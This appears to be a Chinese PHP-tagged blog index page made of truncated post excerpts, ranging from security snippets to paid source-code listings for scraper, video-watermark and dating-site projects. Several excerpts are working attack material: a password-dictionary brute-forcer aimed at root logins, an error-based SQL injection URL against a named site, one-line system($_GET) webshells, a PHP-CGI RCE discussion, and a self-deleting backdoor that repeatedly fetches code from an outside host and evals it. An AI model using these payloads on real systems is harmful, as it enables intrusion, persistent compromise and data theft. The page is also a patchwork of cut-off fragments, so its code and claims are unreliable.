<? set_time_limit(0); //脚本不超时 $ip = "localhost"; //IP $user = "root"; //用户名 $passwd = file("password.txt"); //密码字典 for($i=0; $i<count($passwd); $i++){ $pass = Str_Replace("\r\n", "", $passwd[$i]); //剔除多余的回车+换行 connect($user, $pass); flush(); } echo "扫描结...
首页
标签PHP
之前想找个测试 没想到这有 可以测试下做个记录而已 http://webshell.cc/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003 /data0/htdocs/leqi_new/app/myapp.php 或者 /**********version()**********/ 5.1.49-log http://webshell.cc/download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+coun...
PHP遍历单目录可写权限脚本 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>狗一样的男人检测文件夹权限</title> </head> <body bgcolor="#000000" text="#FFFFFF&q...
国外又发布了一个牛逼闪闪的php cgi远程任意代码执行漏洞:http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/ 粗看一下貌似没啥危害,因为php做了防范,在cgi这个sapi下是无法使用-r,-f等直接执行命令的参数的。只有少数几个参数可以使用,因此公告里也就给出了使用-s参数读取源文件的poc。 另外关于RCE的PoC原文没有给出,不过说明的确可以远程执行代码。那么他是怎么做到的呢?我粗略想了想,可以利用的参数只有一个-d参数了,作用是给php定义一个ini的值。 那么利用它能做什么呢?我给出如下两个RCE的PoC方案: 1...
0x1 原理 1、执行系统命令的函数 proc_open, popen, exec, shell_exec,passthru,system 这里只给出两个例子,其他的可以查看php手册编写 system() <?php system($_GET[‘input’]); ?> http://192.168.247.133:81/shell.php?input=dir ““”执行命令 “执行命令等价于shell_exec()函数来执行命令。 <?php echo`$_GET[input]`; ?> http://192.168.247.133:81/shell.php?input=dir 再来个更短的 <?=@`$_GET[c]`?> http://192.168.247.133:81/shell.php?c=dir 注...
PHP是一种脚本语言,它需要PHP解释器来分析运行PHP文件。当把PHP做为CGI服务Web请求时,它需要被嵌入到某种Web服务器里,最常见的是集成到Apache或IIS里,这就是说,在使用PHP前,你需要安装Apache或IIS,并且正确的配置它们和PHP集成的参数。虽然这种配置已经很规范,文档非常丰富,但我们还是经常在安装Apache和PHP集成时遇到问题,而且,有时候我们只想测试一个简单的PHP特征,不想就为此安装、启动Apache服务。 但据官方文档上说,这个内置的Web服务器只是提供开发测试使用,不推荐使用中生产环境中。因为这个服务器接受处理请求时...
webshell.php <?php unlink($_SERVER['SCRIPT_FILENAME']); ignore_user_abort(true); set_time_limit(0); $remote_file = 'http://xsser.me/webshel.txt'; while($code = file_get_contents($remote_file)){ @eval($code); sleep(5); }; ?> eval.txt file_put_contents('1.txt','hello world '.time()); 使用方式 将 webshel.php 传到服务器之后访问一次他会自删除。但,依然会在后台执行 eval.txt 中的代码。 停止执行 删除或清空 webshel.txt。 缺点 服务器或WEB容器一重启后门就没了。
<?php echo gethostbyname($_SERVER['HTTP_HOST']); ?>
全站资源采集源码 一、源码介绍 全自动更新同步采集某平台整站资源网数据,即可拥有大量资源内容,无需手动发布,同步自动更新资源!快速拥有一个资源网! 采集的标签类型可删减,根据个人可修改替换! 支持任意添加个人信息或者添加广告等等,源码无需数据库,无后台设置,源码全部开源,可打开文件修改替换信息,支持上传二级目录访问!网站引流必备源码 模板排版:精简主题响应式 PHP版本设置:5.6 全站信息配置请打开文件(config.php)修改替换...
短视频无水印源码 短视频无水印网站真的很火也很稀缺,很多人都希望下载到无水印的视频,收藏保存,搭建这样一个网站一定是会让你流量爆棚!! 今天分享一个搭建短视频无水印的网站源码,非常简单好用!! 一、资源介绍 1、搭建方法: 上传服务器或者虚拟空间解压即可 2、使用方法: http://域名/?url=短视频链接 因为步骤比较简单这里不多做说明了哈,需要的可以自行下载,目前优惠哟~ 二、下载地址 原价20.00,限时降价!↓↓ 这部分内容需付费...
恋爱盲盒PHP源码 一、源码介绍 一元交友盲盒源码,市面上动不动都要几百甚至上千的,此源码内附详细搭建教程文档! 可以对接自己支付,全部自定义 搭建:搭建设备需求:服务器+域名 Nginx 1.20.2 MySQL 5.6.50 PHP-5.6 php扩展sg11 PHP版本:PHP7及以上 创建并进入根目录上传并解压文件 导入数据库.sql文件到数据库 修改数据库信息 根目录/data/config.php (7-8-10行) 后台地址:访问域名/admin 账号:admin 密码:123456 二、下载地址 原价100.0...
